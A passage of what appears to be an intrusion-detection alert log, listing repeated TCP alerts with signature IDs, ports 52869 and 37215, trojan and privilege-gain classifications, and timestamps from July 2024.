                      SID:2027339
                      Source Port:42438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.663367
                      SID:2027339
                      Source Port:58860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.096689
                      SID:2025132
                      Source Port:40626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.763636
                      SID:2831300
                      Source Port:38524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:56.793781
                      SID:2025132
                      Source Port:42486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.420819
                      SID:2027339
                      Source Port:55172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.780012
                      SID:2027339
                      Source Port:57900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.718290
                      SID:2025132
                      Source Port:36944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.455022
                      SID:2027339
                      Source Port:39660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.119232
                      SID:2027339
                      Source Port:56900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.302433
                      SID:2025132
                      Source Port:42312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.056582
                      SID:2829579
                      Source Port:49708
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.624711
                      SID:2025132
                      Source Port:56334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.563600
                      SID:2025132
                      Source Port:34134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.333807
                      SID:2027339
                      Source Port:33356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.835674
                      SID:2835222
                      Source Port:38296
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.672694
                      SID:2831300
                      Source Port:44764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.459218
                      SID:2831300
                      Source Port:39852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.435340
                      SID:2831300
                      Source Port:43702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.159948
                      SID:2829579
                      Source Port:49888
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.954496
                      SID:2027339
                      Source Port:45420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.704882
                      SID:2027339
                      Source Port:54672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.571555
                      SID:2835222
                      Source Port:45152
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.607400
                      SID:2831300
                      Source Port:40552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.627062
                      SID:2829579
                      Source Port:48346
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.409134
                      SID:2835222
                      Source Port:34730
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.243447
                      SID:2027339
                      Source Port:38852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.357839
                      SID:2027339
                      Source Port:56734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.462705
                      SID:2027339
                      Source Port:56136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.177523
                      SID:2027339
                      Source Port:59026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.265249
                      SID:2025132
                      Source Port:60272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.354200
                      SID:2027339
                      Source Port:56578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.241970
                      SID:2027339
                      Source Port:56778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.347952
                      SID:2027339
                      Source Port:53006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.657123
                      SID:2829579
                      Source Port:55504
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.392392
                      SID:2831300
                      Source Port:50516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.533213
                      SID:2027339
                      Source Port:41758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.834336
                      SID:2831300
                      Source Port:53112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.183172
                      SID:2025132
                      Source Port:41402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:05.614115
                      SID:2027339
                      Source Port:58526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.967255
                      SID:2027339
                      Source Port:49834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.082891
                      SID:2027339
                      Source Port:34116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.195412
                      SID:2027339
                      Source Port:47790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.830942
                      SID:2027339
                      Source Port:44430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.186287
                      SID:2025132
                      Source Port:47062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.490071
                      SID:2027339
                      Source Port:57868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.262794
                      SID:2027339
                      Source Port:36568
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.686159
                      SID:2027339
                      Source Port:50668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.194696
                      SID:2027339
                      Source Port:34886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.594252
                      SID:2027339
                      Source Port:49932
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.474846
                      SID:2027339
                      Source Port:33648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.011285
                      SID:2027339
                      Source Port:40684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.592012
                      SID:2025132
                      Source Port:34676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.633204
                      SID:2831300
                      Source Port:56390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:11.351053
                      SID:2025132
                      Source Port:41584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.121675
                      SID:2027339
                      Source Port:38506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.980733
                      SID:2831300
                      Source Port:32800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.571555
                      SID:2835222
                      Source Port:58670
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.818180
                      SID:2027339
                      Source Port:36236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.833027
                      SID:2829579
                      Source Port:48746
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.483611
                      SID:2027339
                      Source Port:60458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.727506
                      SID:2027339
                      Source Port:50074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.950772
                      SID:2027339
                      Source Port:33016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.824928
                      SID:2025132
                      Source Port:33864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.034294
                      SID:2027339
                      Source Port:60636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.457080
                      SID:2027339
                      Source Port:37510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.324397
                      SID:2829579
                      Source Port:48534
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.061893
                      SID:2835222
                      Source Port:53586
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.657123
                      SID:2829579
                      Source Port:59528
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.981585
                      SID:2027339
                      Source Port:43668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.524280
                      SID:2831300
                      Source Port:53412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.929504
                      SID:2027339
                      Source Port:50878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.058977
                      SID:2025132
                      Source Port:42486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.468494
                      SID:2027339
                      Source Port:58312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.327720
                      SID:2835222
                      Source Port:42976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.383849
                      SID:2835222
                      Source Port:36642
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.587077
                      SID:2027339
                      Source Port:51958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.179082
                      SID:2027339
                      Source Port:49096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:20.681117
                      SID:2027339
                      Source Port:49660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.093159
                      SID:2027339
                      Source Port:57862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.257590
                      SID:2025132
                      Source Port:36938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.862992
                      SID:2835222
                      Source Port:52494
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.925500
                      SID:2027339
                      Source Port:39458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.333807
                      SID:2831300
                      Source Port:38768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.161261
                      SID:2025132
                      Source Port:47420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.533759
                      SID:2835222
                      Source Port:38360
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.412131
                      SID:2831300
                      Source Port:35768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.339999
                      SID:2835222
                      Source Port:59796
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.556801
                      SID:2027339
                      Source Port:35880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.266004
                      SID:2027339
                      Source Port:60988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.301028
                      SID:2025132
                      Source Port:38242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:16.584797
                      SID:2027339
                      Source Port:49048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.297270
                      SID:2025132
                      Source Port:52708
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.645434
                      SID:2025132
                      Source Port:49250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:16.602976
                      SID:2025132
                      Source Port:35892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.533428
                      SID:2025132
                      Source Port:50242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.298825
                      SID:2831300
                      Source Port:48366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.328888
                      SID:2829579
                      Source Port:40416
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.575243
                      SID:2027339
                      Source Port:42752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.120793
                      SID:2835222
                      Source Port:32822
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.581239
                      SID:2027339
                      Source Port:40642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.648426
                      SID:2835222
                      Source Port:57654
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.312437
                      SID:2027339
                      Source Port:51998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.061926
                      SID:2027339
                      Source Port:33714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.035942
                      SID:2829579
                      Source Port:56914
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.036527
                      SID:2829579
                      Source Port:53362
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.383065
                      SID:2025132
                      Source Port:43736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:17.683294
                      SID:2831300
                      Source Port:56680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.501247
                      SID:2835222
                      Source Port:53402
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.344794
                      SID:2025132
                      Source Port:49946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.853184
                      SID:2829579
                      Source Port:36174
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.463555
                      SID:2027339
                      Source Port:58530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.839035
                      SID:2027339
                      Source Port:37002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.626588
                      SID:2829579
                      Source Port:53414
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.592127
                      SID:2027339
                      Source Port:35770
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.002596
                      SID:2025132
                      Source Port:50104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.013302
                      SID:2027339
                      Source Port:54346
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.377377
                      SID:2027339
                      Source Port:51110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.224203
                      SID:2831300
                      Source Port:38778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.701555
                      SID:2027339
                      Source Port:36150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.102034
                      SID:2025132
                      Source Port:46134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.598734
                      SID:2835222
                      Source Port:39928
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.357082
                      SID:2835222
                      Source Port:33630
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.487097
                      SID:2025132
                      Source Port:54070
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:12.712041
                      SID:2025132
                      Source Port:36236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:16.252147
                      SID:2027339
                      Source Port:58196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.444430
                      SID:2025132
                      Source Port:60994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:17.383428
                      SID:2025132
                      Source Port:36058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.780090
                      SID:2829579
                      Source Port:41908
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.802194
                      SID:2025132
                      Source Port:42210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:21.994838
                      SID:2025132
                      Source Port:57492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.354373
                      SID:2829579
                      Source Port:43462
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.005292
                      SID:2025132
                      Source Port:53238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.803048
                      SID:2027339
                      Source Port:57020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.338927
                      SID:2829579
                      Source Port:33080
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.392754
                      SID:2829579
                      Source Port:50152
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.554950
                      SID:2831300
                      Source Port:40516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:50.384864
                      SID:2027339
                      Source Port:53240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.372687
                      SID:2025132
                      Source Port:58556
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.762153
                      SID:2829579
                      Source Port:33940
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.461008
                      SID:2027339
                      Source Port:56390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.960840
                      SID:2027339
                      Source Port:49810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.601619
                      SID:2027339
                      Source Port:45872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.476168
                      SID:2831300
                      Source Port:52054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:28.980707
                      SID:2027339
                      Source Port:59688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.364513
                      SID:2027339
                      Source Port:60172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.351081
                      SID:2027339
                      Source Port:40112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.447452
                      SID:2027339
                      Source Port:45752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.627062
                      SID:2829579
                      Source Port:43206
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.238265
                      SID:2835222
                      Source Port:55116
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.995753
                      SID:2831300
                      Source Port:40852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.143657
                      SID:2835222
                      Source Port:55772
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.946132
                      SID:2027339
                      Source Port:49414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.995860
                      SID:2027339
                      Source Port:43888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.103906
                      SID:2835222
                      Source Port:33066
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.849532
                      SID:2025132
                      Source Port:51742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.544145
                      SID:2027339
                      Source Port:53730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.266425
                      SID:2027339
                      Source Port:50808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.664378
                      SID:2829579
                      Source Port:49980
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.283865
                      SID:2027339
                      Source Port:50622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.119639
                      SID:2829579
                      Source Port:58642
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.460027
                      SID:2027339
                      Source Port:57102
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.682403
                      SID:2027339
                      Source Port:46774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.994750
                      SID:2027339
                      Source Port:49016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.269253
                      SID:2027339
                      Source Port:32800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:50.384864
                      SID:2027339
                      Source Port:44738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.957724
                      SID:2025132
                      Source Port:52062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.687825
                      SID:2027339
                      Source Port:45664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.718240
                      SID:2027339
                      Source Port:40108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.216480
                      SID:2025132
                      Source Port:39806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.954404
                      SID:2831300
                      Source Port:33816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:51.995876
                      SID:2831300
                      Source Port:53002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.590968
                      SID:2831300
                      Source Port:35702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:19.603798
                      SID:2027339
                      Source Port:42498
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.345531
                      SID:2025132
                      Source Port:38510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:07.479533
                      SID:2027339
                      Source Port:49252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.433285
                      SID:2831300
                      Source Port:51754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.907864
                      SID:2027339
                      Source Port:58758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.572869
                      SID:2025132
                      Source Port:40470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.528818
                      SID:2027339
                      Source Port:56542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.922875
                      SID:2025132
                      Source Port:55580
                      Destination Port:52869
                      Protocol:TCP
